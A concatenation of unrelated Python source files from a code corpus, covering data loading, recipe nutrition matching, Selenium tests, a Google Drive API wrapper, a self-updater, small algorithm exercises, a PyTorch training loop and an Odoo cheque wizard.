Ex: os.chdir(\"C:/Users/johnsmith/Downloads\")\nos.chdir(\"\")\n\nfile_name = \"brf_sum_text_2007.tsv.zip\"\nf_name = \"brf_sum_text_2007.tsv\"\n# Selecting the zip file.\nzf = zip.ZipFile(file_name)\n# Reading the selected file in the zip.\nchunksize = 10 ** 4\ncount = 1\nn_obs = 0\nfinal = []\nfor df in pd.read_csv(zf.open(f_name), delimiter=\"\\t\", chunksize=chunksize, quoting=csv.QUOTE_NONNUMERIC):\n print('processing chunk: ' + str(count))\n n_obs += len(df)\n count += 1\n final.append(df)\n# Create data frame with all observations\ndf = pd.concat(final)\n# Print summary of data: number of observations, columns, and each variable data type\nprint(n_obs)\nprint(df.dtypes)","sub_path":"04_bulk_pregrant_read_in/Python Scripts/brf_sum_text_2007.py","file_name":"brf_sum_text_2007.py","file_ext":"py","file_size_in_byte":906,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"490780221","text":"import json\nfrom fuzzywuzzy import fuzz\n##load reduced recipe with units data\njson_file='reduced_recipes_with_units.json'\njson_data=open(json_file)\nrecipe_data = json.load(json_data)\njson_data.close()\n##load nutrition file\njson_file2='nutrition_reduced.json'\njson_data2=open(json_file2,'r')\nnutrition_data = json.load(json_data2)\njson_data2.close()\ntext_file = open(\"Output.txt\", \"w\")\ndef strip(string):\n\tnewstr = string.replace(\"(\", \"\")##delete the '(),'\n\tnewstr=newstr.replace(\")\", \"\")\n\tnewstr=newstr.replace(\",\", \"\")\n\treturn newstr\n\n##Define a list of recognizatle units and frequent words that appear in recipes. \nrelevantUnits = ['cup', 'cups', 'teaspoon', 'fresh', 'leaves', \n'unsweetened', 'sweetened', 'medium', 'diced' ,'large', 'small', \n'tbsps', 'tsps', 'teaspoons', 'pounds', 'ground', 'seed', 'tbsp', \n'tsp', 'pound', 'lb', 'tablespoon','tablespoons', 'ounces', 'oz', \n'chopped', 'canned', 'drained', 'cubes', 'brown', 'ripe', 'powdered', \n'sliced', 'slices', 'slice', 'preserves', 'minced', 'seeded', \n'toasted', 'quartered', 'minced', 'strips', 'with', 'crushed','cured', \n'thredded', 'powdered', 'grated', 'mixed', 'hard-cooked']\ndef strToFloat(string):\n\ttry:\n\t\treturn float(string)\n\texcept:\n\t\treturn False\n###Function that modifies nutrition data to suit the quantity taken from recipe\ndef modifyNutrition(ingredient):\n##TODO: if ingredient['magnitude']==0, use data from nutrition data. 
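A hedged sketch of that fallback (editor's note, not the author's code; assumes the per-100g reference values may be returned unscaled):\n# if ingredient['magnitude'] == '0':\n#\treturn ingredient['nutrition_data']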
\n\tif ingredient['magnitude']!='0' and ingredient['unit']=='NA':\n\t\tfor k in ingredient['nutrition_data']:\n\t\t\tif k!='GmWt_1' and\tk!='GmWt_Desc1' and k!='GmWt_2' and k!='GmWt_Desc2' and k!='Shrt_Desc' and k!='NDB_No':\n\t\t\t\tif(ingredient['nutrition_data']['GmWt_1']!=''):\n\t\t\t\t\tingredient['nutrition_data'][k]=strToFloat(ingredient['nutrition_data']['GmWt_1'])/100*strToFloat(ingredient['magnitude'])\n\t\t\t\t\t# print('a')\n\t\t\t\telse:\n\t\t\t\t\tingredient['nutrition_data'][k]=strToFloat(ingredient['nutrition_data']['GmWt_2'])/100*strToFloat(ingredient['magnitude'])\n\t\t\t\t\t# print('b')\n\tif ingredient['magnitude']!='0' and ingredient['unit']!='NA':\n\t\tfor k in ingredient['nutrition_data']:\n\t\t\tif k!='GmWt_1' and\tk!='GmWt_Desc1' and k!='NDB_No' and k!='GmWt_2' and k!='GmWt_Desc2' and k!='Shrt_Desc':\n\t\t\t\tingredient['nutrition_data'][k]=strToFloat(ingredient['magnitude'])*strToFloat(ingredient['nutrition_data'][k])\n\t\t\t\t# print('c')\n\treturn ingredient['nutrition_data']\n\ntotalscore = 0\n\nparseData = []\ndata = nutrition_data['SUGARS,GRANULATED'] \n\nfor recipe in recipe_data:\n\tnewData = {}\n\t# print(recipe)\n\tlistRecipe={}\n\tfor ingredient in recipe['new ingredients']:\n\n\t\tmaxRatio = 0\n\t\tmatched = ''\n\t\tname = ingredient['name']\n\t\tisSugar = False\n\t\tlistName = name.split(' ')\n\t\tfor word in listName:\n\t\t\tif strip(word.strip()) in relevantUnits:\n\t\t\t\t# print (word)\n\t\t\t\tlistName.remove(word)\n\t\t\t\tname = ' '.join(listName)\n\t\t\t# if strToFloat(word)!=False:\n\t\t\tif strip(word.strip())=='sugar':\n\t\t\t\tisSugar = True\n\t\t\t\tname = 'SUGARS,GRANULATED'\n\t\t\tif strip(word.strip())=='salt':\n\t\t\t\tisSalt = True\n\t\t\t\tname = 'SALT,TABLE'\n\t\t\tif strip(word.strip())==('eggs' or 'egg'):\n\t\t\t\t# isSalt = True\n\t\t\t\tname = 'EGG,WHL,RAW,FRSH'\n\t\t\t\n\t\tfor k in name:\n\t\t\t# print (k)\n\t\t\tif strToFloat(k)!=False or k=='/':\n\t\t\t\tname = name.replace(k,'')\n\t\t# print (name)\n\t\t##The \n\t\tNDBno = ''\n\t\tdatum = ''\n\t\t# for item in nutrition_data:\n\t\t# \t# print (nutrition_data[item])\n\t\t\t\n\t\t# \tdescription = nutrition_data[item]['Shrt_Desc'].lower()\n\t\t# \tdescription = description.split(',')\n\t\t# \tif len(description)>=2:\n\t\t# \t\tdescription = description[0] + ' ' + description[1]\n\t\t# \t\t# print(type(fuzz.ratio(name, item)))\n\t\t# \t\t##perform fuzzy search and calculate similarity\n\t\t# \ttoken_set_Ratio = fuzz.token_set_ratio(name, description)\n\t\t# \tratio = fuzz.ratio(name, description)\n\t\t# \tpartialRatio = fuzz.partial_ratio(name, description)\n\t\t# \ttoken_sort_Ratio = fuzz.token_sort_ratio(name, description)\n\t\t# \tratios = [token_set_Ratio, partialRatio, token_sort_Ratio]\n\t\t# \tbestRatio = max(ratios)\n\t\t# \tif maxRatio ==0 or bestRatio>maxRatio:\n\t\t# \t\tmaxRatio = bestRatio\n\t\t# \t\ttotalscore+=maxRatio\n\t\t# \t\tmatched = description\n\t\t# \t\tNDBno = nutrition_data[item]['NDB_No']\n\t\t# \t\tdatum = item\n\t\t# newData[ingredient['name']] = NDBno\n\tlistRecipe[recipe['title']] = newData\n\tprint(listRecipe)\n\tparseData.append(listRecipe)\n\n\t\t\n\t\t# ingredient['nutrition_data'] = nutrition_data[datum]\n\t\t# \t# print(ingredient['nutrition_data'])\n\t\t# \t##TODO: if ingredient['magnitude']==0, use data from nutrition data. 
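The disabled lines below would scale the matched record via modifyNutrition; they stay commented out because the fuzzy-match loop above is commented out too (editor's note).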
\n\t\t# ingredient['nutrition_data']=modifyNutrition(ingredient)\n\t\t# print(ingredient['magnitude'])\n\t\t# print(ingredient['nutrition_data'])\n\t\t# print(ingredient['name'], ' ', datum)\n\t\t\n\t\t# print (nutrition_datum)\n\t\n\t# print(newData)\n\t# parseData.append(newData)\t\n\t# parseData.append(newData)\n\t\t# print (\"Name of ingredient: \", str(name))\n\t\t# print(\"Score of similarity: \" ,str(maxRatio))\n\t\t# print( \"Matched to: \", str(matched))\n\t\t# print(\"Matched number: \", str(NDBno))\nprint (parseData)\nwith open('reduced_recipes_with_nutrition.json', 'w') as outfile:\n\t\tjson.dump(parseData, outfile)\n# print(\"TOTAL SCORE: \" ,totalscore)\n\n##write final parsed data to the outfile\n\n\n","sub_path":"data/Python/match_ingredients.py","file_name":"match_ingredients.py","file_ext":"py","file_size_in_byte":5095,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"603251022","text":"import unittest\nimport os\nfrom selenium import webdriver\nfrom selenium.webdriver import Chrome\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.chrome.options import Options\nfrom selenium.webdriver.support import expected_conditions as expected\nfrom selenium.webdriver.support.wait import WebDriverWait\n\nBaseURL = os.environ.get('BaseURL')\n\nclass Remix_Tests(unittest.TestCase):\n\n def setUp(self):\n options = Options()\n options.add_argument('-headless')\n options.add_argument('--disable-dev-shm-usage')\n options.add_argument('--no-sandbox')\n self.driver = Chrome(executable_path='/usr/local/bin/chromedriver', options=options)\n\n def test_check_showcase_link(self):\n driver = self.driver\n driver.get(\"https://\" + BaseURL)\n showcase = driver.find_element_by_link_text(\"Explore\")\n showcase.click()\n\n def test_check_media_link(self):\n driver = self.driver\n driver.get(\"https://\" + BaseURL)\n media = driver.find_element_by_link_text(\"Learn\")\n media.click()\n\n def test_check_projects_link(self):\n driver = self.driver\n driver.get(\"https://\" + BaseURL)\n projects = driver.find_element_by_link_text(\"Build\")\n projects.click()\n\n def test_verify_media_corps(self):\n driver = self.driver\n driver.get(\"https://\" + (BaseURL) + \"/media-corps\")\n\n def tearDown(self):\n self.driver.close()\n\nif __name__ == \"__main__\":\n unittest.main()\n","sub_path":"spec/selenium/chrome_test.py","file_name":"chrome_test.py","file_ext":"py","file_size_in_byte":1498,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"49831225","text":"from sc_desktop import handler\nfrom steamcontroller.events import Pos\n\n\nclass Handler(handler.Handler):\n def __init__(self, *args, **kwargs):\n self.feature_points = kwargs.pop('features')\n self.feature_radius2 = kwargs.pop('radius')**2\n self.n_hit = kwargs.pop('n_hit')\n self.haptic = kwargs.pop('haptic', None)\n self._gestures = kwargs.pop('gestures')\n\n kwargs.pop('wnd')\n super(Handler, self).__init__(*args, **kwargs)\n\n self._feature = None\n self._count = 0\n self._hit_list = []\n\n def _first_padtouch(self, x, y):\n self.ix, self.iy = x, y\n self._count = 0\n self._hit_list = []\n self._feature = None\n\n def _pad_touch(self, pad, x, y):\n for i, (fx, fy) in enumerate(self.feature_points):\n dx, dy = x - fx, y - fy\n if (dx**2 + dy**2) <= self.feature_radius2:\n if self._feature is None:\n self._feature = i\n self._count = 1\n elif i == self._feature:\n self._count += 1\n break\n else:\n return\n\n if 
self._hit_list and self._hit_list[-1] == i:\n return\n\n self._hit_list.append(i) \n if self.haptic is not None:\n self.haptic_fb(pad, self.haptic['amplitude'])\n\n for g in self._gestures:\n if g['features'] == self._hit_list:\n self.do_action(g['action'])\n\n def pad_touch_left(self, x, y):\n self._pad_touch(Pos.LEFT, x, y)\n\n def pad_touch_right(self, x, y):\n self._pad_touch(Pos.RIGHT, x, y)\n\n def first_pad_touch_right(self, x, y):\n self._first_padtouch(x, y)\n\n def first_pad_touch_left(self, x, y):\n self._first_padtouch(x, y)\n","sub_path":"sc_desktop/handlers/padgesture.py","file_name":"padgesture.py","file_ext":"py","file_size_in_byte":1790,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"588644833","text":"#!/usr/bin/env python\nimport os, sys, subprocess\nfrom time import sleep\ndef file_get_contents(filename):\n with open(filename) as f:\n return f.read()\nprint('Getting Latest Update!')\nonline_version = subprocess.check_output(\"curl https://raw.githubusercontent.com/PythonMatrix/PythonMatrix/master/docs/version\", shell=True)\nlocal_version = file_get_contents('./docs/version')\nprint(local_version)\nif local_version != online_version:\n print('Updating...')\n subprocess.check_output(\"cd ..\", shell=True)\n subprocess.check_output(\"wget https://github.com/PythonMatrix/PythonMatrix/blob/updates/PMLatest.pythonmatrix?raw=true\", shell=True)\n subprocess.check_output(\"unzip -o PMLatest.pythonmatrix\", shell=True)\n subprocess.check_output(\"rm PMLatest.pythonmatrix\", shell=True)\n print(\"Please Restart PythonMatrix for updates to install.\")\nelse:\n print('You have the Latest Version!')\n# if subprocess.check_output(\"cat docs/version\", shell=True) == subprocess.check_output(\"curl https://raw.githubusercontent.com/PythonMatrix/PythonMatrix/master/docs/version\", shell=True)\n","sub_path":"pythonmatrix/files/updater.py","file_name":"updater.py","file_ext":"py","file_size_in_byte":1095,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"443658398","text":"import os, sys, time, itertools\nimport pandas as pd\nimport sklearn.linear_model\nimport numpy as np\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.model_selection import train_test_split\n\ndef main():\n data_core = pd.read_csv('pk.labeled.tsv',sep='\\t',header=None)\n data_extra = pd.read_csv('pk.nlm180.tsv',sep='\\t',header=None)\n\n X_core = data_core[1].tolist()\n y_core = data_core[0].tolist()\n\n X_extra = data_extra[4].tolist()\n y_extra = [ y if isinstance(y,str) else 'NULL' for y in data_extra[3].tolist() ]\n\n y_extra_yep = data_extra[2].tolist()\n\n vx = CountVectorizer(ngram_range=(1,4),\n token_pattern=r'\\b\\w+\\b', \n min_df=1)\n vx.fit(X_core + X_extra)\n\n m1 = sklearn.linear_model.LogisticRegression(C=1.0)\n label_space = list(set(y_core))\n\n print('Starting with {} unlabeled examples'.format(len(y_extra)))\n\n X_aux, y_aux = aux_dataset(X_extra, y_extra)\n m1.fit(vx.transform(X_core + X_aux), y_core + y_aux)\n\n y_proba = m1.predict_proba(vx.transform(X_extra))\n y_pred = m1.predict(vx.transform(X_extra))\n \n confidence = np.max(y_proba,axis=-1)\n easy = np.where(confidence > 0.6)[0].tolist()\n\n easy = [ idx for idx in easy if y_extra[idx] == 'NULL' ]\n\n increase_codes = ['C54355', 'C54602', 'C54603', 'C54604', 'C54605',\n 'C54357','C54610','C54611','C54612','C54613']\n \n adding = 0\n for idx in easy:\n if y_pred[idx] in increase_codes and y_extra_yep[idx] 
== 'Increase_Interaction':\n y_extra[idx] = y_pred[idx]\n adding += 1\n elif y_pred[idx] not in increase_codes and y_extra_yep[idx] == 'Decrease_Interaction':\n y_extra[idx] = y_pred[idx]\n adding += 1\n else:\n y_extra[idx] = 'TODO'\n \n if len(y_aux) > 3:\n remains = list(y_extra).count('NULL')\n m1.fit(vx.transform(X_aux),y_aux)\n fit = m1.score(vx.transform(X_core),y_core)\n print('{} easy, +{} added, {} remaining :: fit> {:.2%}'\n .format(len(easy), adding, remains,fit))\n else:\n print('initialized')\n \n data_extra[3] = y_extra\n data_extra.to_csv('pk.nlm180.tsv',sep='\\t',index=False,header=False)\n \ndef aux_dataset(X,y, save_idx = None):\n X_aux = []\n y_aux = []\n new_idx = None\n for i in range(len(y)):\n if y[i] != 'NULL':\n X_aux.append(X[i])\n y_aux.append(y[i])\n if save_idx is not None and i == save_idx:\n new_idx = len(y_aux)-1\n \n if new_idx is not None:\n return X_aux, y_aux, new_idx\n else:\n return X_aux, y_aux\n\ndef brute_search(vx, X_core, y_core, X_extra, y_extra, exid, label_space):\n m = sklearn.linear_model.LogisticRegression(C=10)\n scores = []\n for c in label_space:\n y_extra_tmp = [ y if i != exid else c for i, y in enumerate(y_extra) ]\n X_aux, y_aux, new_id = aux_dataset(X_extra, y_extra_tmp, save_idx = exid)\n sample_weight = np.ones(len(y_aux))\n sample_weight[new_id] = len(y_aux)/10.0\n m.fit(vx.transform(X_aux),y_aux, sample_weight=sample_weight)\n scores.append(m.score(vx.transform(X_core),y_core))\n \n maximum = np.max(scores)\n if len(np.where(scores >= maximum)[0]) > 1:\n return None\n else:\n return label_space[np.argmax(scores)]\n\nif __name__ == '__main__':\n main()","sub_path":"dataset/pk_bootstrap/bootstrap.py","file_name":"bootstrap.py","file_ext":"py","file_size_in_byte":3424,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"25004666","text":"import json\nfrom datetime import datetime, timedelta, timezone\nfrom urllib.parse import urlencode\n\nimport requests\nfrom dateutil import parser\nfrom django.conf import settings\nfrom django.contrib import messages\nfrom django.http import *\n\nfrom .models import *\n\n\ndef add_storage_account(request, next_url, cloud):\n if 'error' in request.GET:\n error_message = 'An error occurred: ' + request.GET['error']\n messages.error(request, error_message)\n return HttpResponseRedirect(next_url)\n elif 'code' in request.GET:\n try:\n r = requests.post('https://www.googleapis.com/oauth2/v4/token',\n {'code': request.GET['code'], 'client_id': settings.GDRIVE_APP_KEY,\n 'client_secret': settings.GDRIVE_APP_SECRET,\n 'redirect_uri': settings.GDRIVE_REDIRECT_URL, 'grant_type': 'authorization_code'})\n credentials = r.json()\n expire_at = (datetime.now(timezone.utc) + timedelta(0, credentials['expires_in'])).isoformat()\n access_token = credentials['access_token']\n refresh_token = credentials['refresh_token']\n r = requests.get(\"https://www.googleapis.com/oauth2/v3/userinfo\",\n headers={'Authorization': 'Bearer ' + access_token})\n about = r.json()\n uid = about['sub']\n full_name = about['name']\n email = about['email']\n except Exception as e:\n messages.error(request, 'An error occurred: ' + str(e))\n else:\n if StorageAccount.objects.all().filter(identifier=uid).exists():\n messages.warning(request, 'This Google Drive space is already linked')\n else:\n sa = StorageAccount(user=request.user, cloud=cloud, identifier=uid, status=1,\n user_full_name=full_name, email=email,\n credentials=json.dumps({'a': access_token, 'r': refresh_token, 'e': 
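# terse keys: 'a' = access token, 'r' = refresh token, 'e' = ISO expiry; get_client() reads these back (editor's note)\n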
expire_at}))\n sa.save()\n messages.success(request, 'A new Google Drive space is now linked to your account')\n return HttpResponseRedirect(next_url)\n else:\n url = 'https://accounts.google.com/o/oauth2/v2/auth'\n param = urlencode({'client_id': settings.GDRIVE_APP_KEY, 'redirect_uri': settings.GDRIVE_REDIRECT_URL,\n 'response_type': 'code', 'scope': settings.GDRIVE_SCOPE, 'access_type': 'offline',\n 'prompt': 'consent select_account'})\n return HttpResponseRedirect(url + '?' + param)\n\n\ndef get_client(acc: StorageAccount) -> str:\n cred = json.loads(acc.credentials)\n expire_at = parser.parse(cred['e'])\n delta = (expire_at - datetime.now(timezone.utc)).total_seconds()\n if delta < 60:\n r = requests.post('https://www.googleapis.com/oauth2/v4/token',\n {'client_id': settings.GDRIVE_APP_KEY, 'client_secret': settings.GDRIVE_APP_SECRET,\n 'refresh_token': cred['r'], 'grant_type': 'refresh_token'})\n if r.status_code == 200:\n j = r.json()\n cred['a'] = j['access_token']\n cred['e'] = (datetime.now(timezone.utc) + timedelta(0, j['expires_in'])).isoformat()\n acc.credentials = json.dumps(cred)\n acc.save()\n return cred['a']\n\n\ndef get_space(g: str) -> dict:\n r = requests.get(\"https://www.googleapis.com/drive/v3/about\", params={'fields': 'storageQuota'},\n headers={'Authorization': 'Bearer ' + g})\n res = r.json()\n used = res['storageQuota']['usage']\n total = res['storageQuota'].get('limit', None)\n return {'used': used, 'total': total}\n\n\ndef find_path_id(g: str, path: str, create: bool = False, is_file=False) -> str:\n fid = 'root'\n if path == '/':\n return fid\n levels = path.strip('/').split('/')\n try:\n for level in levels:\n q = \"'%s' in parents and name='%s' and trashed=false\" \\\n % (fid.replace(\"'\", \"\\\\'\"), level.replace(\"'\", \"\\\\'\"))\n if not is_file:\n q += \" and mimeType='application/vnd.google-apps.folder'\"\n r = requests.get(\"https://www.googleapis.com/drive/v3/files\",\n params={'q': q, 'fields': \"files(id,mimeType)\"},\n headers={'Authorization': 'Bearer ' + g})\n fs = r.json()['files']\n if len(fs) < 1:\n if create:\n fid = create_folder_with_parent_id(g, fid, level)\n else:\n return ''\n else:\n fid = fs[0]['id']\n except:\n return ''\n return fid\n\n\ndef create_folder(g: str, path: str, name: str) -> dict:\n if path == 'root' or path + name == '/':\n return {'id': 'root'}\n fullpath = path if name == '' else path + name\n return {'id': find_path_id(g, fullpath, True)}\n\n\ndef create_folder_with_parent_id(g: str, parent: str, name: str) -> str:\n r = requests.post('https://www.googleapis.com/drive/v3/files',\n json={'mimeType': 'application/vnd.google-apps.folder',\n 'parents': [parent],\n 'name': name},\n headers={'Authorization': 'Bearer ' + g})\n return r.json()['id']\n\n\ndef get_file_list(g: str, path: str) -> list:\n fid = find_path_id(g, path)\n if fid == '':\n return []\n r = requests.get('https://www.googleapis.com/drive/v3/files',\n params={'q': \"'%s' in parents and trashed = false\" % fid.replace(\"'\", \"\\\\'\"),\n 'fields': 'files(id,mimeType,modifiedTime,name,size)'},\n headers={'Authorization': 'Bearer ' + g})\n fs = r.json()\n ret = []\n try:\n for f in fs['files']:\n try:\n if f['mimeType'] == 'application/vnd.google-apps.folder':\n ret.append({'name': f['name'], 'id': f['id'], 'is_folder': True})\n else:\n ret.append({'name': f['name'], 'id': f['id'], 'size': f.get('size', 0),\n 'time': parser.parse(f['modifiedTime']), 'is_folder': False})\n except:\n raise\n except:\n raise\n return ret\n\n\ndef get_down_link(g: str, 
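# g is the OAuth bearer token; when fid is empty the path is resolved via find_path_id (editor's note)\n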
fid: str, path: str) -> str:\n    if not fid:\n        fid = find_path_id(g, path, False, True)\n    r = requests.get('https://www.googleapis.com/drive/v3/files/' + fid,\n                     params={'fields': 'mimeType,webContentLink,webViewLink'},\n                     headers={'Authorization': 'Bearer ' + g})\n    j = r.json()\n    if j['mimeType'].startswith('application/vnd.google-apps.'):\n        if 'webContentLink' in j:\n            return j['webContentLink']\n        elif 'webViewLink' in j:\n            return j['webViewLink']\n        else:\n            raise Exception('File not found')\n    else:\n        r = requests.get('https://www.googleapis.com/drive/v3/files/' + fid,\n                         params={'alt': 'media', 'access_token': g},\n                         allow_redirects=False)\n        if r.status_code < 300 or r.status_code >= 400:\n            r.raise_for_status()\n        if 'Location' in r.headers:\n            return r.headers['Location']\n        else:\n            raise Exception('File not found')\n\n\ndef get_upload_creds(g: str, data: str) -> dict:\n    try:\n        j = json.loads(data)\n        parent = j['parent']\n        name = j['name']\n    except Exception:\n        return {}\n    r = requests.get('https://www.googleapis.com/drive/v3/files',\n                     params={'q': \"'%s' in parents and name='%s' and trashed=false and \"\n                                  \"mimeType!='application/vnd.google-apps.folder'\"\n                                  % (parent.replace(\"'\", \"\\\\'\"), name.replace(\"'\", \"\\\\'\")),\n                             'fields': 'files(id)'},\n                     headers={'Authorization': 'Bearer ' + g})\n    fs = r.json()['files']\n    if len(fs) < 1:\n        r = requests.post('https://www.googleapis.com/upload/drive/v3/files?uploadType=resumable',\n                          json={'parents': [parent], 'name': name},\n                          headers={'Authorization': 'Bearer ' + g})\n    else:\n        r = requests.patch('https://www.googleapis.com/upload/drive/v3/files/%s?uploadType=resumable' % fs[0]['id'],\n                           headers={'Authorization': 'Bearer ' + g})\n    return {'url': r.headers['Location']}\n\n\ndef delete(g: str, data: list) -> dict:\n    for id in data:\n        try:\n            r = requests.delete('https://www.googleapis.com/drive/v3/files/' + id,\n                                headers={'Authorization': 'Bearer ' + g})\n        except Exception as e:\n            print(str(e))\n    return {}\n\n\ndef rename(g: str, data: list, to: str) -> dict:\n    for id in data:\n        try:\n            r = requests.patch('https://www.googleapis.com/drive/v3/files/' + id,\n                               json={'name': to},\n                               headers={'Authorization': 'Bearer ' + g})\n        except Exception as e:\n            print(str(e))\n    return {}\n","sub_path":"bigbox/gdrive_interface.py","file_name":"gdrive_interface.py","file_ext":"py","file_size_in_byte":9194,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"486730409","text":"# -*- coding:utf-8 -*-\r\nclass ListNode:\r\n    def __init__(self, x):\r\n        self.val = x\r\n        self.next = None\r\nclass Solution:\r\n    def deleteDuplication(self, pHead):\r\n        # the list 1->2->3->3->4->4->5 becomes 1->2->5: every value that repeats is removed entirely\r\n        if not pHead or not pHead.next:\r\n            return pHead\r\n        dummy = ListNode(-1)\r\n        dummy.next = pHead\r\n        pre, slow, fast = dummy, dummy.next, dummy.next.next\r\n        while fast:\r\n            if slow.val == fast.val:  # compare values; slow and fast are distinct nodes, so identity checks never match\r\n                while fast and slow.val == fast.val:\r\n                    fast = fast.next\r\n                pre.next = fast\r\n                slow = fast\r\n                if not fast:  # guard before advancing, otherwise fast.next raises AttributeError\r\n                    return dummy.next\r\n                fast = fast.next\r\n            else:\r\n                pre, slow, fast = pre.next, slow.next, fast.next\r\n        return dummy.next\r\n\r\n","sub_path":"towords_offer/linked list/18-2 删除链表重复的节点.py","file_name":"18-2 删除链表重复的节点.py","file_ext":"py","file_size_in_byte":824,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"176668552","text":"\"\"\"\nidea: If the node has a right child, its successor is somewhere lower in the tree. Go to the right once and then as many times to the left as you could. 
Return the node you end up with.\nNode has no right child, and hence its successor is somewhere upper in the tree. Go up till the node that is left child of its parent. The answer is the parent.\n\"\"\"\n\n\nfrom bintree_class import TreeNode\n\n\ndef get_io_successor(root, target):\n candidate = None\n while root:\n if root.val == target:\n if root.right is not None:\n candidate = root.right\n while candidate.left is not None:\n candidate = candidate.left\n root = None\n elif target < root.val:\n candidate = root\n root = root.left\n else:\n root = root.right\n return candidate.val\n\n\ndef get_inorder(root):\n if root is None:\n return None\n get_inorder(root.left)\n print(root.val)\n get_inorder(root.right)\n\n\ndef insert(root, val):\n if root is None:\n root = TreeNode(val)\n else:\n if val > root.val:\n if root.right is None:\n root.right = TreeNode(val)\n else:\n insert(root.right, val)\n else:\n if root.left is None:\n root.left = TreeNode(val)\n else:\n insert(root.left, val)\n\n\nroot = TreeNode(20)\ninsert(root, 8)\ninsert(root, 22)\ninsert(root, 4)\ninsert(root, 12)\ninsert(root, 10)\ninsert(root, 14)\nget_inorder(root)\nexpected = 20\nactual = get_io_successor(root, 14)\nprint(expected == actual)\n","sub_path":"tree/successor.py","file_name":"successor.py","file_ext":"py","file_size_in_byte":1618,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"133168897","text":"from typing import Any, Iterable\nfrom py_config_runner import Schema, get_params\n\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nfrom torch.utils.data import DataLoader\n\n# this config schema can be imported if torch is installed\nfrom py_config_runner import TrainConfigSchema\n\n\nclass TorchTrainingConfigSchema(Schema):\n # Define required parameters for another training config\n # Type hints are from typing\n seed: int\n debug: bool\n\n num_epochs: int\n\n train_loader: DataLoader\n val_loader: DataLoader\n\n model: nn.Module\n criterion: nn.Module\n optimizer: optim.Optimizer\n\n\ndef run(config, **kwargs):\n\n # Let's validate the config\n TorchTrainingConfigSchema.validate(config)\n # and additionally agains built-in TrainConfigSchema\n TrainConfigSchema.validate(config)\n\n print(\"Configuration: \")\n for k, v in get_params(config, TrainConfigSchema).items():\n print(f\"\\t{k}: {v}\")\n\n device = config.get(\"device\", \"cuda\")\n model = config.model\n model.to(device)\n\n criterion = config.criterion\n optimizer = config.optimizer\n\n for e in range(config.num_epochs):\n print(\"Epoch {} / {}\".format(e + 1, config.num_epochs))\n for i, batch in enumerate(config.train_loader):\n if (i % 50) == 0:\n print(\" \", end=\".\")\n x, y = batch[0].to(device), batch[1].to(device)\n optimizer.zero_grad()\n y_pred = model(x)\n loss = criterion(y_pred, y)\n loss.backward()\n optimizer.step()\n print(\"\")\n\n if e % config.get(\"val_interval\", 3) == 0:\n num_corrects = 0\n num_samples = 0\n for batch in config.val_loader:\n x, y = batch[0].to(device), batch[1].to(device)\n y_pred = model(x)\n\n num_corrects += (y_pred.argmax(dim=1) == y).sum()\n num_samples += y_pred.shape[0]\n\n print(f\"Validation: accuracy = {num_corrects / num_samples}\")\n","sub_path":"examples/pytorch/training.py","file_name":"training.py","file_ext":"py","file_size_in_byte":2003,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"631759738","text":"from Game.Sprite import Sprite\n\nclass Background(Sprite):\n\tdef 
__init__(self, thisScene, imageFile, xSize, ySize, scrollX = 0, scrollY = 0):\n\t\tsuper().__init__(thisScene, imageFile, xSize, ySize)\t\t\n\t\tself.scrollAmountX = scrollX\n\t\tself.scrollAmountY = scrollY\n\t\tself.setBoundAction(Sprite.CONTINUE)\n\n\t\t\n\tdef update(self, offX = 0, offY = 0):\n\n\t\texternX = int(offX * self.scrollAmountX)\n\t\texternY = int(offY * self.scrollAmountY)\t\t\n\t\t\n\t\t\n\t\tfor ix in range((externX * -1), self.cWidth, self.width):\n\t\t\tfor iy in range((externY * -1),self.cHeight, self.height):\n\t\t\t\tself.setPosition(ix + self.width/2, iy + self.height/2)\n\t\t\t\tsuper().update()\n\t\t\t\t\t","sub_path":"Game/Background.py","file_name":"Background.py","file_ext":"py","file_size_in_byte":645,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"140851639","text":"# -*- coding: utf-8 -*-\n\nfrom odoo import fields, models, api, _\n\n\nclass HandedToPartnerNRWizard(models.TransientModel):\n _name = 'handed.to.partner.nr.wizard'\n _description = 'Handed To Partner NR Wizard'\n\n journal_id = fields.Many2one('account.journal', string='Journal', translate=True)\n account_id = fields.Many2one('account.account', string='Account', translate=True)\n date = fields.Date(string='Date', default=fields.Date.context_today, translate=True)\n note = fields.Char(string='Notes', translate=True)\n\n @api.multi\n def handed_to_partner_action(self):\n context = dict(self.env.context or {})\n active_id = context.get('active_id', False)\n if active_id:\n obj = self.env['account.check.nr'].browse(active_id)\n move_line_vals = []\n\n if not self.journal_id.default_credit_account_id:\n raise ValidationError(_(\"You must determine the default account of Under Partnerion Journal!\"))\n\n line = (0, 0, {'account_id': self.account_id.id,\n 'partner_id': obj.check_partner.id,\n 'name': obj.check_number,\n 'debit': obj.amount,\n 'credit': 0.0,\n })\n move_line_vals.append(line)\n line = (0, 0, {'account_id': self.journal_id.default_credit_account_id.id,\n 'partner_id': obj.check_partner.id,\n 'name': obj.check_number,\n 'debit': 0.0,\n 'credit': obj.amount,\n })\n move_line_vals.append(line)\n\n move_vals = {\n \"date\": self.date,\n \"name\": str(obj.check_number),\n \"line_ids\": move_line_vals,\n 'ref': obj.payment_id.communication or '',\n 'company_id': obj.company_id.id,\n 'journal_id': obj.journal_id.id,\n }\n move = self.env['account.move'].create(move_vals)\n\n operation_values = {\n 'date': self.date,\n 'type': 'nr',\n 'type_of_check': 'nr',\n 'operation': 'Handed To Partner',\n 'journal_id': move.journal_id.id,\n 'move_id': 